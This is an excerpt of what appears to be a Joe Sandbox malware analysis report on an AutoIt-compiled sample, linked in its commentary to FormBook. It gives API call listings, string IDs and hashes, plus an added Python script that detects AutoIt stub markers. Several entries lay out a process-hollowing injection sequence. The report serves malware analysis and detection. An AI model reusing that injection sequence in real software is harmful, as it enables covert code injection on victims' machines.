                                                                                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 010DE98C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010D9000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2613161777-0
                                                                                                    • Opcode ID: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction ID: 2f6465a0692248f980432adef56549bc1c6242fea6a7e644c9ce389dbf9de1f8
                                                                                                    • Opcode Fuzzy Hash: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction Fuzzy Hash: AD0227A068A3C16FE343A7B0CC61B957F319F57604F1A54DEE2C49F1E3C9AA5805CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 010DE6E7
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 010DE749
                                                                                                    • WriteProcessMemory.KERNELBASE ref: 010DE797
                                                                                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 010DE87D
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE8D5
                                                                                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE921
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 010DE96C
                                                                                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 010DE98C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DB000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2613161777-0
                                                                                                    • Opcode ID: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction ID: 2f6465a0692248f980432adef56549bc1c6242fea6a7e644c9ce389dbf9de1f8
                                                                                                    • Opcode Fuzzy Hash: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction Fuzzy Hash: AD0227A068A3C16FE343A7B0CC61B957F319F57604F1A54DEE2C49F1E3C9AA5805CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 010DE6E7
                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 010DE749
                                                                                                    • WriteProcessMemory.KERNELBASE ref: 010DE797
                                                                                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 010DE87D
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE8D5
                                                                                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 010DE921
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 010DE96C
                                                                                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 010DE98C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000003.1580860266.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_3_10d9000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2613161777-0
                                                                                                    • Opcode ID: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction ID: 2f6465a0692248f980432adef56549bc1c6242fea6a7e644c9ce389dbf9de1f8
                                                                                                    • Opcode Fuzzy Hash: 17ffb71a541176d874e6044af2fdb43a82506bdb40e88a815aefbf2af866df07
                                                                                                    • Instruction Fuzzy Hash: AD0227A068A3C16FE343A7B0CC61B957F319F57604F1A54DEE2C49F1E3C9AA5805CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 001DDCC1
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 001DDCCF
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 001DDCEF
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 001DDD9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3243318325-0
                                                                                                    • Opcode ID: 4fa46ecbdfc6d64130a2118d3f4528ff7a5da879808339b65037c6537906d2d9
                                                                                                    • Instruction ID: 6a7c78551dee6248d37bb4ac9f5f35065c534776035888d1d5fc4159f1849d5f
                                                                                                    • Opcode Fuzzy Hash: 4fa46ecbdfc6d64130a2118d3f4528ff7a5da879808339b65037c6537906d2d9
                                                                                                    • Instruction Fuzzy Hash: C731A2711083009FD701EFA4DC85BAFBBF8AF98354F04482DF589872A2EB719944CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,001B4686), ref: 001DE397
                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 001DE3A6
                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 001DE3B7
                                                                                                    • FindClose.KERNEL32(00000000), ref: 001DE3C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2695905019-0
                                                                                                    • Opcode ID: fb02ae9c62219a780c3072de13eb6f3d4719a3fc7f9f65cffd505178e27d1b84
                                                                                                    • Instruction ID: d6da26dff2fb4bdbb2ff8a1dbcc22d14fece510e9f693f479405d6d96d1cdf51
                                                                                                    • Opcode Fuzzy Hash: fb02ae9c62219a780c3072de13eb6f3d4719a3fc7f9f65cffd505178e27d1b84
                                                                                                    • Instruction Fuzzy Hash: 86F0A030412A106BC211777CAC0D8BA7BECAE41336B504712F835C22F6DBB099A54695
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0019504E,?,002398D8,0000000C,001951A5,?,00000002,00000000), ref: 00195099
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0019504E,?,002398D8,0000000C,001951A5,?,00000002,00000000), ref: 001950A0
                                                                                                    • ExitProcess.KERNEL32 ref: 001950B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: d90e1c284165c8cdf0838e25d83234297c7d4c209b91540beb61ec7d51893aff
                                                                                                    • Instruction ID: e39748eac7d7164b6a5b6594c4b44aae4256fe661299f5f9a411276ec925840b
                                                                                                    • Opcode Fuzzy Hash: d90e1c284165c8cdf0838e25d83234297c7d4c209b91540beb61ec7d51893aff
                                                                                                    • Instruction Fuzzy Hash: 09E0B631401648AFCF226FA4ED0DE597B6AEB51381F044054F8599A132DB75DD42CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph
                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Graph of function 173e15-173fb3 (rendered control-flow graph; node and edge data not reproduced in text)
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                    • API String ID: 0-1645009161
                                                                                                    • Opcode ID: 561603c6243034574f5ff7e391276d3487052bdf833274ecd1339276e926e7bd
                                                                                                    • Instruction ID: 268b320cdc3de70687cd1117b2b7bfcdf4d2e9258c04dab5f456399303ce1560
                                                                                                    • Opcode Fuzzy Hash: 561603c6243034574f5ff7e391276d3487052bdf833274ecd1339276e926e7bd
                                                                                                    • Instruction Fuzzy Hash: E781F671A44205BBDF21AF64DC42FEE3BB8AF29750F048024F909AB197EB70DA51D791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

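The directive strings in the String ID above (#OnAutoItStartRegister, #include-once, #requireadmin, #pragma compile, the "Bad directive syntax error" and "Cannot parse #include" messages), together with the "AutoIt v3 GUI" window class and the "Software\AutoIt v3\AutoIt" registry path that appear in later functions of this same dump, are the script-directive parser and GUI setup of the AutoIt v3 interpreter stub that every compiled AutoIt script carries. The following Python script is an added example, not part of the Joe Sandbox report or of the sample: it scans a file for those markers in both UTF-16LE and ASCII form (the stub calls the wide-char APIs RegOpenKeyExW and RegisterClassExW, so wide strings are the expected hit) and prints the file's MD5/SHA1/SHA256 so the result can be matched against the report header. The marker list is taken from this report, the sample buffer is constructed, and the match threshold of three distinct markers is an assumption.

```python
import hashlib
import sys

# Marker strings taken from this report's String IDs (AutoIt v3 runtime stub).
# The stub uses wide-char Win32 APIs, so each marker is searched for in both
# UTF-16LE and ASCII encodings.
AUTOIT_MARKERS = (
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#notrayicon",
    "#include-once",
    "#pragma compile",
    "AutoIt v3 GUI",
    "Software\\AutoIt v3\\AutoIt",
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
)

# Assumption: three or more distinct markers is treated as a confident match.
MATCH_THRESHOLD = 3


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA256 of the buffer, for comparison with the report header."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def find_autoit_markers(data: bytes) -> dict:
    """Return {marker: [encodings in which it was found]} for markers present in data."""
    hits = {}
    for marker in AUTOIT_MARKERS:
        found = [enc for enc in ("utf-16-le", "ascii") if marker.encode(enc) in data]
        if found:
            hits[marker] = found
    return hits


def classify(data: bytes) -> dict:
    """Hashes plus marker hits plus a verdict on whether this looks like an AutoIt stub."""
    hits = find_autoit_markers(data)
    return {
        "hashes": file_hashes(data),
        "markers": hits,
        "is_autoit_stub": len(hits) >= MATCH_THRESHOLD,
    }


# Constructed sample buffer standing in for a PE image: three markers embedded
# as UTF-16LE strings amid filler bytes. Not taken from the analysed sample.
SAMPLE_BUFFER = (
    b"MZ" + b"\x00" * 64
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 32
    + "#OnAutoItStartRegister".encode("utf-16-le") + b"\x00\x00"
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + b"\xcc" * 16
)

# Constructed buffer with no AutoIt markers at all.
BENIGN_BUFFER = b"MZ" + b"\x00" * 128 + b"Hello, world" + b"\xcc" * 16


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = SAMPLE_BUFFER
    result = classify(data)
    for name, digest in result["hashes"].items():
        print(f"{name}: {digest}")
    for marker, encodings in result["markers"].items():
        print(f"marker {marker!r} found as {', '.join(encodings)}")
    print("AutoIt v3 stub:", result["is_autoit_stub"])


if __name__ == "__main__":
    main(sys.argv)
```

A hit only says the file is an AutoIt-compiled executable, not that it is malicious: the functions listed in this report are the legitimate interpreter, and the behaviour the report flags (the anti-VM script, the FormBook payload) lives in the embedded script and in what it injects. The next step after a hit is to extract and read that script rather than to analyse the stub further.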
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 0017EEB7
                                                                                                    • timeGetTime.WINMM ref: 0017F0B7
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017F1D8
                                                                                                    • TranslateMessage.USER32(?), ref: 0017F22B
                                                                                                    • DispatchMessageW.USER32(?), ref: 0017F239
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017F24F
                                                                                                    • Sleep.KERNELBASE(0000000A), ref: 0017F261
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2189390790-0
                                                                                                    • Opcode ID: 13c74c600f089690bc0a7e3d35189909d8d704363576e23d6c2cc4cdf0148dd1
                                                                                                    • Instruction ID: eadbaeec70a85aed8ce285462194daf8f309f9a667698dee49f4f98c4636be55
                                                                                                    • Opcode Fuzzy Hash: 13c74c600f089690bc0a7e3d35189909d8d704363576e23d6c2cc4cdf0148dd1
                                                                                                    • Instruction Fuzzy Hash: 1732BC70608341DFDB28CB24C848FAAB7F5BFA5304F54856DF46987292C771E989CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of the function at 00173696 (legend: Executed / Not Executed; the rendered graph image is not reproduced here). Blocks in the graph call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus.
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00173690,?,?), ref: 001736FE
                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00173690,?,?), ref: 0017372A
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0017374D
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00173690,?,?), ref: 00173758
                                                                                                    • CreatePopupMenu.USER32 ref: 0017376C
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0017378D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                    • String ID: 0$$$0$$$TaskbarCreated
                                                                                                    • API String ID: 129472671-621057671
                                                                                                    • Opcode ID: acd5054471446eb338446a3259c9b4846a1c29264318ee9a527451709b7cb34e
                                                                                                    • Instruction ID: 1535ebc7a3759368c422e0e2784bdb624c330f14b10df1cef807656fcbcd59b2
                                                                                                    • Opcode Fuzzy Hash: acd5054471446eb338446a3259c9b4846a1c29264318ee9a527451709b7cb34e
                                                                                                    • Instruction Fuzzy Hash: 7A4148B5214241FBDB2C2F78EC0EBB93A75E715310F808225F5398A2A1CB749B05B711
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 001735DE
                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00173608
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00173619
                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00173636
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00173646
                                                                                                    • LoadIconW.USER32(000000A9), ref: 0017365C
                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0017366B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                    • Opcode ID: f857cf2ecef503221fdd18f73a161714e206bd5391848a3a21040da065a266f9
                                                                                                    • Instruction ID: 2a398fee4b1dd427ff2adb08ed4317daa0c808c9c90b147f5dd7902192374a14
                                                                                                    • Opcode Fuzzy Hash: f857cf2ecef503221fdd18f73a161714e206bd5391848a3a21040da065a266f9
                                                                                                    • Instruction Fuzzy Hash: E621E2B9902308EFDB009FE5E889B9DBBB4FB09700F10411AF515A62A1D7B445458F91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    Control-flow graph of the function at 001B09FB (legend: Executed / Not Executed; the rendered graph image is not reproduced here). Blocks in the graph call GetFileType, GetLastError and CloseHandle around the CreateFileW subcall listed below.
                                                                                                    APIs
                                                                                                      • Part of subcall function 001B073A: CreateFileW.KERNELBASE(00000000,00000000,?,001B0AA4,?,?,00000000,?,001B0AA4,00000000,0000000C), ref: 001B0757
                                                                                                    • GetLastError.KERNEL32 ref: 001B0B0F
                                                                                                    • __dosmaperr.LIBCMT ref: 001B0B16
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 001B0B22
                                                                                                    • GetLastError.KERNEL32 ref: 001B0B2C
                                                                                                    • __dosmaperr.LIBCMT ref: 001B0B35
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001B0B55
                                                                                                    • CloseHandle.KERNEL32(?), ref: 001B0C9F
                                                                                                    • GetLastError.KERNEL32 ref: 001B0CD1
                                                                                                    • __dosmaperr.LIBCMT ref: 001B0CD8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 4f8c2be8495621b3d288945b1cdebab834214baafd9a8e90d1b69807f338557e
                                                                                                    • Instruction ID: 19c4eac10314e96cadc64f764dabebbce25ae5065e3e8f104e5d9f1a3f9f23f2
                                                                                                    • Opcode Fuzzy Hash: 4f8c2be8495621b3d288945b1cdebab834214baafd9a8e90d1b69807f338557e
                                                                                                    • Instruction Fuzzy Hash: B9A12736A042049FDF1AAFB8D896BEE7BA0EB1A324F14015DF815DB2D1DB309953CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0017551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00175539
                                                                                                      • Part of subcall function 001751BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001751E1
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0017534B
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001B4BD7
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001B4C18
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001B4C5A
                                                                                                    • _wcslen.LIBCMT ref: 001B4CC1
                                                                                                    • _wcslen.LIBCMT ref: 001B4CD0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                    • API String ID: 98802146-2727554177
                                                                                                    • Opcode ID: be43573cf3b2c177ef0a8cb4e4ee57c88c9bc4fe81b5a5112c6e18fb8e5d01b3
                                                                                                    • Instruction ID: 719d5f4256833686e6c29d29b52d80db8d95f650d7606ed2fd99c67826d76897
                                                                                                    • Opcode Fuzzy Hash: be43573cf3b2c177ef0a8cb4e4ee57c88c9bc4fe81b5a5112c6e18fb8e5d01b3
                                                                                                    • Instruction Fuzzy Hash: B6718C715053009FC714EF65E8899ABBFF8FFAA750F40446EF449871A2EB709A48CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00173465
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00173474
                                                                                                    • LoadIconW.USER32(00000063), ref: 0017348A
                                                                                                    • LoadIconW.USER32(000000A4), ref: 0017349C
                                                                                                    • LoadIconW.USER32(000000A2), ref: 001734AE
                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001734C6
                                                                                                    • RegisterClassExW.USER32(?), ref: 00173517
                                                                                                      • Part of subcall function 001735AB: GetSysColorBrush.USER32(0000000F), ref: 001735DE
